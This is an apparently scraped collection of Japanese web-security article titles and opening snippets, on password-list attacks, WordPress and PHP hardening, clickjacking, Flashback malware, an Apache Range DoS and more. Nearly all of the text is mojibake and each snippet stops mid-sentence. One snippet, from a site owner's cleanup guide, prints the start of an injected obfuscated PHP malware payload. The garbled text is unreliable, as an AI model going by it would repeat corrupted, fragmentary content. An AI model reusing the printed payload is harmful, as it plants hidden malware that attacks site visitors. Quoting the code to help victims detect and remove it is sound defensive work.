eBook Japanã®ç™ºè¡¨è³‡æ–™ã«è¦‹ã‚‹ãƒ‘スワードリスト攻撃ã®ã€Œæã‚ã—ã„æˆæžœã€ã¨å¯¾ç–
eBook Japanã«å¯¾ã™ã‚‹ä¸æ£ã‚¢ã‚¯ã‚»ã‚¹ã«ã¤ã„ã¦ã€è©³ç´°ã®ç™ºè¡¨ãŒã‚ã‚Šã€ã„ã‚ゆる「パスワードリスト攻撃ã€ã§ã‚ã‚‹ã“ã¨ãŒç™ºè¡¨ã•ã‚Œã¾ã—ãŸã€‚ å‰å›žã®ã”å ±å‘Šã¾ã§ã¯ã€Œè¤‡æ•°ã®IPアドレスã‹ã‚‰ãƒã‚°ã‚¤ãƒ³ãƒšãƒ¼ã‚¸ã«å¯¾ã—ã¦æ©Ÿæ¢°çš„ã«ç·å½“ãŸã‚Šæ”»æ’ƒç‰ã‚’è¡Œã†å¤§é‡ã‚¢ã‚¯ã‚»ã‚¹è¡Œç‚ºï¼ˆãƒ–ルートフォースアタック)ã€ã¨ã”説明ã—ã¦ãŠã‚Šã¾ã—ãŸãŒã€è©³ç´°èª¿æŸ»ã®çµæžœã€ã€Œä¸æ£ã®ç–‘ã‚れる複数ã®IPアドレスã‹ã‚‰ãƒã‚°ã‚¤ãƒ³ãƒšãƒ¼ã‚¸ã«å¯¾ã—ã¦ã€äºˆã‚æŒã£ã¦ã„ãŸãƒã‚°ã‚¤ãƒ³IDã¨ãƒ‘スワードã®é©ç”¨å¯å¦ã‚’試行ã™ã‚‹å¤§é‡ã‚¢ã‚¯ã‚»ã‚¹è¡Œç‚ºã€ã§ã‚ã‚‹ã“ã¨ãŒåˆ¤æ˜Žã„ãŸã—ã¾ã—ãŸã€‚ ã¤ã¾ã‚Šã€å¤§é‡ã‚¢ã‚¯ã‚»ã‚¹è¡Œç‚ºã‚’仕掛ã‘ã¦ããŸè€…ã¯ã€å½“社以外ã®ä»–ã®ã‚µãƒ¼ãƒ“スãªã©ã§ä»–ã®ã‚µãƒ¼ãƒ“スã®ãƒã‚°ã‚¤ãƒ³IDã¨ãƒ‘スワードをä¸æ£ã«å…¥æ‰‹ã—ã€ãƒ¦ãƒ¼ã‚¶ãƒ¼ãŒãƒã‚°ã‚¤ãƒ³IDã¨ãƒ‘スワードを共通ã«è¨å®šã—ã¦ã„ã‚‹å¯èƒ½æ€§ã‚’ç‹™ã£ã¦å½“社サービスã«ä¸æ£ã«ãƒã‚°ã‚¤ãƒ³ã—よã†ã¨ã—ã€ä¸Šè¨˜ä»¶æ•°ã«ã¤ã„ã¦ã¯ãƒã‚°ã‚¤ãƒ³ã«æˆåŠŸã—ã¦ã—ã¾ã£ãŸã¨ã„ã†ã“ã¨ã§ã™ã€‚ ãã®ã‚ˆã†ã«åˆ¤æ–ã—ãŸæ ¹æ‹
WordPress使ã„ãªã‚‰ã“ã‚Œã ã‘ã¯ã‚„ã£ã¦ãŠããŸã„本当ã®ã‚»ã‚ュリティ対ç–10é …ç›®
ã©ã†ã‚‚ã€ãƒ–ルーã§ã™ã€‚秋ã§ã™ã。 å£ç¯€ãŒã‚ãã‚‹ã”ã¨ã«ã€ŒWordPressãŒã‚¯ãƒ©ãƒƒã‚¯ã•ã‚ŒãŸã®ã§ã€ã‚»ã‚ュリティ対ç–ã«ã¤ã„ã¦èª¿ã¹ã¦ã¿ã¾ã—ãŸã€çš„ãªãƒ–ãƒã‚°è¨˜äº‹ãŒã‚½ãƒ¼ã‚·ãƒ£ãƒ«ä¸Šã§å‡ºã¾ã‚ã‚Šã€ãã®ãŸã³ã«WordPressを扱ã†ãƒ‡ãƒ™ãƒãƒƒãƒ‘ー層ãŒã€Œã¾ãŸç„¡æ„味ãªå¯¾ç–ãŒã¯ã¦ãƒ–ã•ã‚Œã¦ã‚‹â€¦ã€ã¨å˜†ãã®ãŒæ’例行事ã®ã‚ˆã†ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚例ãˆã°â€¦ 「WordPressã®ãƒãƒ¼ã‚¸ãƒ§ãƒ³ã‚’éš ã™ã€ 「データベースã®ãƒ—レフィクスを変更ã™ã‚‹ã€ 「サブディレクトリーã«ã‚¤ãƒ³ã‚¹ãƒˆãƒ¼ãƒ«ã™ã‚‹ã€ ã†ã‚“ã€æ°—休ã‚程度ã‹ãªâ€¦ 「2年以上放置ã•ã‚Œã¦ã„る怪ã—ã’ãªã‚»ã‚ュリティ対ç–プラグインを入れる〠ãã£ã¡ã®ã»ã†ãŒã“ãˆãˆã‚ˆï¼ 「サーãƒãƒ¼ã®ãƒ‡ã‚£ãƒ¬ã‚¯ãƒˆãƒªãƒ¼ä¸€è¦§ã®éžè¡¨ç¤ºã€ ãれ見ãˆã¡ã‚ƒã£ã¦ã‚‹ã‚µãƒ¼ãƒãƒ¼ç®¡ç†è€…ã§ã¯ã€ä½•ã—ã¦ã‚‚ä¸å®‰ã ã‚ˆï¼ ã¨ã¯ã„ãˆã€ãã†æ€ã„ã¤ã¤ã‚‚「ã“ã‚ŒãŒæ±ºå®šç‰ˆã ï¼ã€çš„ãªè¨˜äº‹ã‚’書ãã®ã¯å‹‡æ°—ãŒã„ã‚‹ã‚‚ã®ã§ã™ã€‚特ã«ã‚»ã‚ュリティæ¥ç•Œã¯æ€–ã„ãŠå…„ã•ã‚“ãŒå¤šâ€¦ã†ã‚何をã™ã‚‹ã‚„ã‚r
Twitterã®ã¤ã¶ã‚„ãã‹ã‚‰è‡ªå®…ã®ä½æ‰€ã‚’特定ã™ã‚‹ã‚µã‚¤ãƒˆWeKnowYourHouse.com
Twitterã®æŠ•ç¨¿ã‹ã‚‰ã€æŠ•ç¨¿è€…ã®è‡ªå®…ä½æ‰€ã‚’割り出ã™ã¨ã„ã†æã‚ã—ã’ãªã‚µã‚¤ãƒˆãŒä»Šæœˆã‚¹ã‚¿ãƒ¼ãƒˆã—ãŸã€‚ãã®åも「WeKnowYourHouse.comã€ï¼ˆãŠå‰ã®å®¶ã‚’知ã£ã¦ã„る)ã 。 ã“ã®ã‚µã‚¤ãƒˆã¯ã€ã€Œå®¶ã«å¸°ã£ãŸã€ã®ã‚ˆã†ãªå®¶ã‹ã‚‰ã¨æ€ã‚れるツイートを探ã—(英語ã®ã¤ã¶ã‚„ããŒå¯¾è±¡ã®ã‚ˆã†ã )ã€ãã®ä½ç½®æƒ…å ±ã‚’ä½¿ã£ã¦ã€ã¤ã¶ã‚„ã„ãŸäººã®ä½æ‰€ã‚’割り出ã—ã¦ã€ã‚µã‚¤ãƒˆä¸Šã«è¡¨ç¤ºã—ã¦ã„る。サイトã«ã¯ã€Œâ—‹â—‹ï¼ˆã‚¢ã‚«ã‚¦ãƒ³ãƒˆå)ã¯Ã—×ã®è¿‘ãã«ä½ã‚“ã§ã„ã‚‹ã€ã¨è¡¨ç¤ºã•ã‚Œã‚‹ï¼ˆä¸€éƒ¨ã¯ä¼ã›å—ã«ãªã£ã¦ã„る)。ã‹ãªã‚Šè©³ç´°ãªå ´æ‰€ãŒç‰¹å®šã•ã‚Œã¦ã„ã‚‹ã®ã¯è¦‹ã¦ã„ã¦æ€–ããªã‚‹ã€‚ WeKnowYourHouse.com åŒã‚µã‚¤ãƒˆã¯ã€SNSã®ãƒ—ライãƒã‚·ãƒ¼ã«é–¢ã™ã‚‹å®Ÿé¨“ã¨ã—ã¦ä½œã‚‰ã‚Œã€ã‚µã‚¤ãƒˆä¸Šã«ã¯éŽåŽ»1時間分ã®ãƒ‡ãƒ¼ã‚¿ã®ã¿ã‚’表示ã—ã€ãƒ‡ãƒ¼ã‚¿ã¯ä¿å˜ã›ãšç ´æ£„ã—ã¦ã„ã‚‹ã¨ã„ã†ã€‚ä½æ‰€ã‚’表示ã—ã¦ã»ã—ããªã„人ã«ã¯è¡¨ç¤ºæ‹’å¦ã®æ‰‹æ®µã‚‚用æ„ã—ã¦ã„る。ä½ç½®æƒ…å ±ã‚’ä»˜ã‘ãšã«ã¤ã¶ã‚„ã„ã¦ã„ã‚Œã°ã€WeKnowYo
åˆå¿ƒè€…Webアプリケーション開発者ãŒãƒã‚§ãƒƒã‚¯ã™ã¹ãæƒ…å ±æº2012 - ãƒãƒ‹ãƒ¼ãƒãƒƒã‚¿ãƒ¼ã®éƒ¨å±‹
毎年æ’例ã®è¨ºæ–å‰æº–å‚™ã¨ã—ã¦é–‹ç™ºè€…å‘ã‘ã«ã€ã€Œåˆå¿ƒè€…Webアプリケーション開発者ãŒãƒã‚§ãƒƒã‚¯ã™ã¹ãæƒ…å ±æºã€ã‚’集ã‚ã¦ã„ã‚‹ã®ã§ã€çš†ã•ã‚“ã«ã‚‚ã”紹介。他ã«è¿½åŠ ã—ãŸæ–¹ãŒè‰¯ã„æƒ…å ±æºãŒã‚ã£ãŸå ´åˆã¯ã”指摘ã„ãŸã ã‘ã‚‹ã¨åŠ©ã‹ã‚Šã¾ã™ã€‚ 上ã‹ã‚‰é‡è¦ãªé †ã€‚★ãŒã¨ã‚Šã‚ãˆãšèªã‚“ã©ã‘ã€ã®å¿…é ˆã€‚å¿…é ˆã®ãƒã‚¤ãƒ³ãƒˆã¯ã€çŸæœŸé–“ã§å¤§é›‘把ã«ç¶²ç¾…çš„ã«ãƒã‚¤ãƒ³ãƒˆãŒæ•´ç†ã•ã‚Œã¦ã„ã‚‹ã‚‚ã®ã€‚ 徳丸本ã¯ä»Šå¹´ã¯å¿…é ˆã‹ãªã€‚é›»å書ç±ç‰ˆã‚‚ã‚ã‚‹ã‹ã‚‰ã€ã‚¹ãƒžãƒ›ã«å¸¸å‚™ã§ãã‚‹ã—。 ã‚ã¨ã€å¾ŒåŠã€ã¾ã£ãŸãåˆå¿ƒè€…å‘ã‘ã˜ã‚ƒãªã„ã‘ã©ã€ã‚»ã‚ュリティã‚ャンプ生å‘ã‘ã«Webテストã§ãã‚‹ãŸã‚ã®ãƒ„ール類を紹介。Webã‚»ã‚ュリティ組ã®å‚考ã«ã€ã‚ã¨ã€ãƒãƒƒãƒˆãƒ¯ãƒ¼ã‚¯ã‚»ã‚ュリティ組もFiddler2を使ã†ã®ã¯ãƒ‘ケットã®ä¸èº«ã®å¯è¦–化ã«è‰¯ã„ã¨æ€ã†ã®ã§ã€ã‚¤ãƒ³ã‚¹ãƒˆãƒ¼ãƒ«ã—ã¦è¦‹ã‚‰ã‚Œã‚‹ã®ãŒã‚ˆã‚ã—ã„ã‹ã¨ã€‚ã“ã“ã¯ãƒ„ãƒ¼ãƒ«æƒ…å ±ã‚’å®šæœŸçš„ã«ãƒã‚¹ãƒˆã—よã†ã¨æ€ã†ã®ã§ã€ã‚ャンプ生ã¯ãƒã‚§ãƒƒã‚¯ã—ã¦ãŠã„ã¦æ¬²ã—ã„。 ★Webサイト構築 安全ãª
エãƒã‚µã‚¤ãƒˆã«ã€Œã„ã„ãã€ã—ãŸäººãŒã‚¨ãƒã‚µã‚¤ãƒˆã‚’見ã¦ã„ãŸã¨ã¯é™ã‚‰ãªã„ | コーヒーサーãƒã¯é¦™ç‚‰ã§ã‚ã‚‹
コーヒーサーãƒã¯é¦™ç‚‰ã§ã‚ã‚‹ 美人プãƒã‚°ãƒ©ãƒžã”ã†ã ã¾ã‚Šã½ã®ãƒ–ãƒã‚°ã§ã™ãŒãƒ‡ãƒ¼ã‚¿ãŒå¹ã£é£›ã‚“ã§ã—ã¾ã£ã¦ä»®å¾©æ—§ä¸ã€‚ç”»åƒãŒå…¥ã£ã¦ã„ãªã„ã¨ã“ã‚ã€æ•´å½¢ã•ã‚Œã¦ã„ãªã„ã¨ã“ã‚ãªã©ãŒã‚ã‚Šã¾ã™ã€‚ 検索 メインメニュー 最近ã€çŸ¥ã‚‰ãªã„ã†ã¡ã«ã‚¢ãƒ€ãƒ«ãƒˆã‚µã‚¤ãƒˆãªã©ã‚’Facebookã§ã€Œã„ã„ãã€ã—ã¦ã—ã¾ã†ã¨ã„ã†å•é¡ŒãŒè©±é¡Œã«ãªã£ã¦ã„る。 知らãªã„é–“ã«ã‚¢ãƒ€ãƒ«ãƒˆã‚µã‚¤ãƒˆã‚’「ã„ã„ã〠Facebook知人ã€åŒåƒšã«æ€§çš„嗜好ãŒãƒãƒ¬ã‚‹ (J-CASTニュース) ã“ã‚Œã«ã¯ã‚¯ãƒªãƒƒã‚¯ã‚¸ãƒ£ãƒƒã‚ングã¨å‘¼ã°ã‚Œã‚‹æ‰‹æ³•ãŒä½¿ã‚ã‚Œã¦ã„る。ãŸã¨ãˆã°ã€ãƒ¦ãƒ¼ã‚¶ãŒèˆˆå‘³ã‚’引ãよã†ãªç”»åƒã‚’表示ã—ã¦ã‚¯ãƒªãƒƒã‚¯ã‚’促ã—ã€å®Ÿéš›ã«ã¯ãã®ä¸Šã«ã‹ã¶ã›ã‚‹ã‚ˆã†ã«è¨ç½®ã—ãŸã€Œé€æ˜Žã®ã€Žã„ã„ãã€ãƒœã‚¿ãƒ³ã€ã‚’押ã•ã›ã‚‹ã¨ã„ã†ã‚ˆã†ãªä»•çµ„ã¿ã 。ページ内ã®è¦ç´ ã®ã€Œé€æ˜Žåº¦ã€ã‚’変ãˆã‚‹ã“ã¨ã§ã‚ã‚Šã¨ç°¡å˜ã«ä»•æŽ›ã‘られる。 ã‹ã‚“ãŸã‚“ãªçµµã§ã‚らã‚ã—ã¦ã¿ãŸã€‚図ä¸ã®ã„ã„ãボタンã¯åŠé€æ˜Žã«ãªã£ã¦ã„ã‚‹ã‘ã‚Œã©ã€å®Ÿéš›ã«ä»•æŽ›ã‘ã‚‹å ´åˆã¯é€æ˜Ž
「オープンソース形å¼ã§Webアプリセã‚ュリティã®å‘ä¸Šã‚’ã€ ï¼ ï¼ IT
2012/04/10 Webアプリケーションã®ã‚»ã‚ュリティ改善ã«å‘ã‘ãŸå•“発ã€ç ”究活動を行ã†éžå–¶åˆ©å›£ä½“ã€The Open Web Application Security Project(OWASP)ã®æ—¥æœ¬æ”¯éƒ¨ã§ã‚ã‚‹OWASP JAPANãƒãƒ£ãƒ—ターã¯3月27æ—¥ã€ç¬¬1回ã®Local Chapter Meetingを開催ã—ãŸã€‚今後もã“ã†ã—ãŸã‚»ãƒŸãƒŠãƒ¼ã‚’定期的ã«é–‹å‚¬ã—ã¦ã„ãæ–¹é‡ã 。 OWASPã¯ã€Webアプリケーションセã‚ュリティã®å‘上を目的ã¨ã—ãŸå›£ä½“ã 。Webアプリケーションã®è„†å¼±æ€§ãƒ¯ãƒ¼ã‚¹ãƒˆ10ã‚’å–ã‚Šã¾ã¨ã‚ãŸæ–‡æ›¸ã€ŒOWASP Top 10ã€ã‚’定期的ã«å…¬é–‹ã™ã‚‹ã»ã‹ã€å®‰å…¨ãªã‚¢ãƒ—リケーション開発ã®ãŸã‚ã®ã‚¬ã‚¤ãƒ‰ãƒ©ã‚¤ãƒ³ã‚„脆弱性診æ–ãƒãƒ¥ãƒ¼ãƒˆãƒªã‚¢ãƒ«ã€è¨ºæ–トレーニング用ã®â€œã‚„られWebアプリケーションâ€ã§ã‚る「WebGoatã€ãªã©ã€ã•ã¾ã–ã¾ãªãƒªã‚½ãƒ¼ã‚¹ã‚’æä¾›ã—ã¦ã„る。 JAPANãƒãƒ£ãƒ—ターリーダーã®1人ã€Benny
エフセã‚ュアブãƒã‚° : (Mac)Flashbackã¯ã‚ã‚‹ã‹ï¼Ÿ
(Mac)Flashbackã¯ã‚ã‚‹ã‹ï¼Ÿ 2012å¹´03月23æ—¥21:52 ツイート fsecure_corporation クアラルンプール発 by:スレットソリューションãƒãƒ¼ãƒ 月曜ã€Flashbackトãƒã‚¤ã®æœ¨é¦¬ã«ã‚ˆã£ã¦Macã«éšœå®³ãŒèµ·ããªã„方法をã”紹介ã—ãŸã€‚今日ã¯Flashback感染を見ã¤ã‘る方法ã«é–¢ã™ã‚‹æƒ…å ±ã‚’æä¾›ã™ã‚‹ã€‚ 以下ã®ã‚¹ãƒ†ãƒƒãƒ—をより良ãç†è§£ã™ã‚‹ã«ã¯ã€Flashbackã«ã¤ã„ã¦ã‚‚多少ã—ã¦ã„ã‚‹æ–¹ãŒè‰¯ã„ã ã‚ã†ã€‚ã“ã‚Œã¯OS Xマルウェアファミリã§ã€Webブラウザã«ã‚ˆã‚Šè¡¨ç¤ºã•ã‚Œã‚‹ã‚³ãƒ³ãƒ†ãƒ³ãƒ„ã‚’ä¿®æ£ã™ã‚‹ã€‚ãã®ãŸã‚ã«ã€åŒãƒžãƒ«ã‚¦ã‚§ã‚¢ã¯Macã®ãƒ–ラウザãŒä½¿ç”¨ã™ã‚‹æ©Ÿèƒ½ã‚’利用ã™ã‚‹ã€‚ä¹—ã£å–られる機能ã¯äºœç¨®ã”ã¨ã«ç•°ãªã‚‹ãŒã€ä¸€èˆ¬ã«CFReadStreamReadãŠã‚ˆã³CFWriteStreamWriteãŒå«ã¾ã‚Œã‚‹ï¼š 標的ã¨ã•ã‚Œã‚‹Webページã¨å¤‰æ›´ã¯ã€ãƒªãƒ¢ãƒ¼ãƒˆã‚µãƒ¼ãƒã‹ã‚‰èªã¿å‡ºã•ã‚Œã‚‹ã‚³ãƒ³ãƒ•ã‚£ã‚®ãƒ¥ãƒ¬ãƒ¼ã‚·ãƒ§
Webプãƒã‚°ãƒ©ãƒžå¿…見。HTML5ã®ã‚»ã‚ュリティãƒãƒ¼ãƒˆã‚·ãƒ¼ãƒˆÂ·HTML5 Security Cheatsheet MOONGIFT
HTML5 Security Cheatsheetã¯HTML5ã®ã‚»ã‚ュリティã«é–¢ã™ã‚‹ãƒãƒ¼ãƒˆã‚·ãƒ¼ãƒˆã§ã™ã€‚å•é¡Œç‚¹ã¨å¯¾è±¡Webブラウザã€å¯¾å‡¦æ³•ãŒä¸€è¦§ã«ãªã£ã¦ã„ã¾ã™ã€‚ HTML5 Security Cheatsheetã¯HTML5ã«ãŠã‘ã‚‹ã‚»ã‚ュリティホールã«ãªã‚Šãˆã‚‹å•é¡Œç‚¹ã‚’コードを通ã˜ã¦åºƒã‚ã¦ã„ã“ã†ã¨ã„ã†ãƒ—ãƒã‚¸ã‚§ã‚¯ãƒˆã§ã™ã€‚Webプãƒã‚°ãƒ©ãƒžå¿…見ã¨è¨€ãˆã‚‹ã§ã—ょã†ã€‚ トップページã§ã™ã€‚様々ãªé …ç›®ãŒä¸¦ã‚“ã§ã„ã¾ã™ã€‚ å·¦å´ã¯å„ã‚»ã‚ュリティãƒã‚§ãƒƒã‚¯ã™ã¹ãé …ç›®ã§ã€å¯¾è±¡ã«ãªã‚‹Webブラウザã¨ãã®ãƒãƒ¼ã‚¸ãƒ§ãƒ³ãŒä¸¦ã‚“ã§ã„ã¾ã™ã€‚å•é¡Œç‚¹ã®æ示ã¨ã¨ã‚‚ã«ã€ãã®å›žé¿ç–ã«ã¤ã„ã¦ã‚‚書ã‹ã‚Œã¦ã„ã¾ã™ã®ã§ã¨ã¦ã‚‚å‚考ã«ãªã‚Šã¾ã™ã€‚ ã¾ã 日本語化ã•ã‚Œã¦ã„ãªã„部分もã‚ã‚Šã¾ã™ã€‚ ã»ã¼å…¨ã¦ã®WebブラウザãŒå¯¾è±¡ã«ãªã‚‹éƒ¨åˆ†ã‚‚ã‚るよã†ã§ã™ã€‚ é …ç›®ã¯éžå¸¸ã«å¤šã„ã§ã™ãŒã€ã‚»ã‚ュリティをé‡è¦–ã™ã‚‹ãŸã‚ã«ã‚‚ãƒã‚§ãƒƒã‚¯ã—ã¦ãŠãã¹ãã§ã™ã€‚ HTML5ã§ã¯ã‚ã‚Šã¾ã™ãŒIE6ãªã©
5分ã§ã§ãã‚‹PHPã‚»ã‚ãƒ¥ãƒªãƒ†ã‚£å¯¾ç– - ã¼ãã¯ã¾ã¡ã¡ã‚ƒã‚“ï¼
ã“ã‚“ã«ã¡ã¯ã“ã‚“ã«ã¡ã¯ï¼ï¼ Webプãƒã‚°ãƒ©ãƒŸãƒ³ã‚°ã—ã¦ã¾ã™ã‹ï¼ よã「PHPã¯ã‚»ã‚ュリティãŒãƒ€ãƒ¡ã€ã¨ã‹è¨€ã‚ã‚Œã¦ã‚‹ã‚ˆã。 ã§ã‚‚ãã‚Œã£ã¦ã€ã¹ã¤ã«PHPãŒæ‚ªã„ã‚“ã˜ã‚ƒãªãã¦ã€ ãŸã¶ã‚“ã€ã‚»ã‚ュリティã¨ã‹ãŒã€ã¾ã よãã‚ã‹ã‚‰ãªã„人ãŒå¤šã„ã ã‘ãªã‚“ã˜ã‚ƒãªã„ã‹ãªã€‚ ãŒã‚“ã°ã£ã¦å‹‰å¼·ã—よã†ã¨æ€ã£ã¦ã‚‚ã€ãªã‚“ã ã‹é›£ã—ã„ç†å±ˆãŒä¸¦ã‚“ã§ã„ãŸã‚Šã™ã‚‹ã—ã…。 ãªã®ã§ä»Šæ—¥ã¯ã€ã‚»ã‚ュリティ対ç–ã«ã¤ã„ã¦ã€ 「ã“ã‚Œã ã‘ã‚„ã£ã¨ã‘ã°ã€ã‚ã‚Šã¨å®‰å…¨ã«ãªã‚‹ã‚ˆã€ã£ã¦ã“ã¨ã‚’ã€åˆå¿ƒè€…ã‚€ã‘ã«ã€å¤§é›‘把ã«æ›¸ã„ã¦ã¿ã¾ã™ï¼ ç†å±ˆãŒã‚ã‹ã‚‰ãªãã¦ã‚‚ã€æœ€åˆã¯ã‚³ãƒ”ペã§ã‚‚〠ãªã«ã‚‚やらãªã„よりã€ã‚„ã£ãŸã»ã†ãŒãã£ã¨ãƒžã‚·ã«ãªã‚‹ï¼ 1. XSSå¯¾ç– å‹•çš„ãªã‚‚ã®ã‚’表示ã™ã‚‹ã¨ãã€å…¨éƒ¨ã‚¨ã‚¹ã‚±ãƒ¼ãƒ—ã™ã‚Œã°okã§ã™ï¼ (NG) ã‚ãªãŸã®åå‰ã¯ <?= $name ?> ã§ã™ãï¼ â†“ (OK) ã‚ãªãŸã®åå‰ã¯ <?= htmlspecialchars($name, ENT_QUOTES) ?>
脆弱性をçªã‹ã‚Œã¦ Web サイトを改ã–ã‚“ã•ã‚Œã¦ã‚¦ã‚£ãƒ«ã‚¹å‘¼ã³å‡ºã—コードを埋ã‚ã“ã¾ã‚ŒãŸãƒ•ã‚¡ã‚¤ãƒ«ã®èª¿ã¹æ–¹ã¨é™¤åŽ»ã¨å¯¾å¿œä½œæ¥ã¨ç”³è«‹æ‰‹ç¶šãã«ã¤ã„ã¦
改ã–ã‚“ã•ã‚Œã¦ã‚¦ã‚£ãƒ«ã‚¹é…布コード埋ã‚ã“ã¾ã‚Œã¦ã‹ã‚‰å¾©æ—§ã¾ã§ã®ä½œæ¥ã‚„申請ã®æ‰‹ç¶šãã«ã¤ã„ã¦ã¾ã¨ã‚ã¦ã„ãã¾ã™ã€‚ 追記: 「改ã–ã‚“ã•ã‚ŒãŸå ´åˆãã®ã‚‚ã®ã®å¯¾å‡¦æ–¹æ³•ã€ã¨ã„ã†æ„味ã§æ›¸ã‹ã›ã¦é ‚ãã¾ã—ãŸã€‚phpMyAdmin ã®è„†å¼±æ€§ã«ã¤ã„ã¦ã§ã¯ãªã全般的ãªå†…容ã¨ãªã£ã¦ãŠã‚Šã¾ã™ã€‚誤解を与ãˆã‚‹è¡¨ç¾ã¨ãªã£ã¦ã—ã¾ã„申ã—訳御座ã„ã¾ã›ã‚“。 今回埋ã‚ã“ã¾ã‚ŒãŸä¸æ£ãªã‚³ãƒ¼ãƒ‰ 実際ã®ã‚³ãƒ¼ãƒ‰ã¯æ”¹è¡Œã‚„スペースãŒãªããªã£ã¦ä¸€è¡Œã®ã‚³ãƒ¼ãƒ‰ã¨ãªã£ã¦ãŠã‚Šã¾ã™ã®ã§éžå¸¸ã«æ°—ã¥ãã«ãã„ã§ã™ã€‚ <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
無効ãªURLã§ã™
無効ãªURLã§ã™ã€‚ プãƒã‚°ãƒ©ãƒ è¨å®šã®åæ˜ å¾…ã¡ã§ã‚ã‚‹å¯èƒ½æ€§ãŒã‚ã‚Šã¾ã™ã€‚ ã—ã°ã‚‰ã時間をãŠã„ã¦å†åº¦ã‚¢ã‚¯ã‚»ã‚¹ã‚’ãŠè©¦ã—ãã ã•ã„。
FFFTP開発終了ã§å¤§é¨’ãŽã—ã¦ã„る人ãŸã¡ã¸ - OR6 blog
最åˆã«æ–ã£ã¦ãŠãã¾ã™ãŒã€FFFTP自体ã¯è‰¯ã„アプリケーションソフトウェアã ã£ãŸã¨æ€ã„ã¾ã™ã€‚UIãŒWindowsã®ã‚¨ã‚¯ã‚¹ãƒ—ãƒãƒ¼ãƒ©ã«å€£ã£ã¦ã„ã‚‹ã¨åŒæ™‚ã«ã‚¨ã‚¯ã‚¹ãƒ—ãƒãƒ¼ãƒ©ã¨ã¯ã²ã¨ç›®ã§è¦‹åˆ†ã‘ãŒã¤ãデザインã ã£ãŸã®ã§ã€ä½¿ã„ã‚„ã™ã‹ã£ãŸã¯ãšã§ã™ã€‚ ã¼ãもインターãƒãƒƒãƒˆã‚’ã¯ã˜ã‚ãŸã”ã最åˆã®é ƒã«ä½¿ã£ã¦ã„ã¾ã—ãŸã€‚ã»ã©ãªãã—ã¦Windows自体を使ã‚ãªããªã£ãŸã®ã§ã€ãれ以æ¥è§¦ã‚‹ã“ã¨ã¯ãªããªã£ãŸã‚ã‘ãªã®ã§ã™ãŒã€‚ FFFTPã¯ä½•æ•…開発終了ã—ãŸã®ã‹é–‹ç™ºè€…ã¯ã€Œé–‹ç™ºã‚’継続ã™ã‚‹ãŸã‚ã®ãƒ¢ãƒãƒ™ãƒ¼ã‚·ãƒ§ãƒ³ãŒç¶æŒã§ããªããªã£ãŸã€ã¨è¿°ã¹ã¦ã„ã‚‹ãã†ã§ã™ãŒã€ã¾ã‚当ãŸã‚Šå‰ã ã¨æ€ã„ã¾ã™ã€‚ FFFTPãŒå‹•ä½œã™ã‚‹Windowsã¨FFFTPãŒæ‰±ã†ãƒ—ãƒãƒˆã‚³ãƒ«ã§ã‚ã‚‹FTP自体ãŒã‚ªãƒ¯ã‚³ãƒ³ã ã‹ã‚‰ã§ã™ã€‚å‰è€…ã«ã¤ã„ã¦ã¯å¹¾ã°ãã‹ã®åè«–ã®ä½™åœ°ã‚‚ã‚ã‚‹ã§ã—ょã†ãŒã€å¾Œè€…ã«ã¤ã„ã¦ã¯ç•°è«–ã¯èªã‚ã¾ã›ã‚“。 「終ã‚ã£ãŸã€ãƒ—ãƒãƒˆã‚³ãƒ«ã®ãŸã‚ã®ã‚½ãƒ•ãƒˆã‚¦ã‚§ã‚¢ã‚’作り続ã‘ã‚‹ã¨ã„ã†ã®ã¯ã€ãƒ—ãƒã‚°ãƒ©ãƒž
Apacheã®æœªè§£æ±ºã®è„†å¼±æ€§ã‚’çªã攻撃ãŒæ¨ªè¡Œ
Apache Web Serverã«æœªè§£æ±ºã®è„†å¼±æ€§ãŒå˜åœ¨ã—ã€ã“ã®è„†å¼±æ€§ã‚’çªã„ãŸæ”»æ’ƒãŒæ¨ªè¡Œã—ã¦ã„ã‚‹ã¨ã—ã¦ã€Apache Software FoundationãŒ8月24日付(米国時間)ã®ã‚¢ãƒ‰ãƒã‚¤ã‚¶ãƒªãƒ¼ã§æ³¨æ„を促ã—ãŸã€‚ アドãƒã‚¤ã‚¶ãƒªãƒ¼ã«ã‚ˆã‚‹ã¨ã€Apacheã§Rangeリクエストを処ç†ã™ã‚‹æ–¹æ³•ã«ã‚µãƒ¼ãƒ“ス妨害(DoS)ã®è„†å¼±æ€§ãŒå˜åœ¨ã™ã‚‹ã€‚影響をå—ã‘ã‚‹ã®ã¯Apache 1.3ã¨Apache 2ã®å…¨ãƒãƒ¼ã‚¸ãƒ§ãƒ³ã€‚脆弱性をçªã„ã¦ãƒªãƒ¢ãƒ¼ãƒˆã‹ã‚‰æ”»æ’ƒã‚’å—ã‘ã‚‹ã¨ã€å¤§é‡ã®ãƒ¡ãƒ¢ãƒªã¨CPUãŒæ¶ˆè²»ã•ã‚Œã¦ã—ã¾ã†æã‚ŒãŒã‚る。 è„†å¼±æ€§æƒ…å ±ã¯å…ˆã«ã‚»ã‚ュリティメーリングリストã§ã‚‚公開ã•ã‚Œã€æ”»æ’ƒãƒ„ールãŒå‡ºå›žã£ã¦åºƒã使ã‚ã‚Œã¦ã„ã‚‹ã¨ã„ã†ã€‚ã“ã®å•é¡Œã‚’ä¿®æ£ã™ã‚‹ãƒ‘ッãƒã¯4日以内ã«å…¬é–‹ã•ã‚Œã‚‹è¦‹é€šã—。アドãƒã‚¤ã‚¶ãƒªãƒ¼ã§ã¯å½“é¢ã®å¯¾ç–ã¨ã—ã¦ã€æ”»æ’ƒã‚’é¿ã‘ã‚‹ãŸã‚ã®è¨å®šæ–¹æ³•ã‚‚紹介ã—ã¦ã„る。
「Google+ã€ã€å¤§é‡ã®ã‚¢ã‚«ã‚¦ãƒ³ãƒˆã‚’削除--本å使用ã«é–¢ã™ã‚‹ãƒãƒªã‚·ãƒ¼é•åãŒç†ç”±ã‹
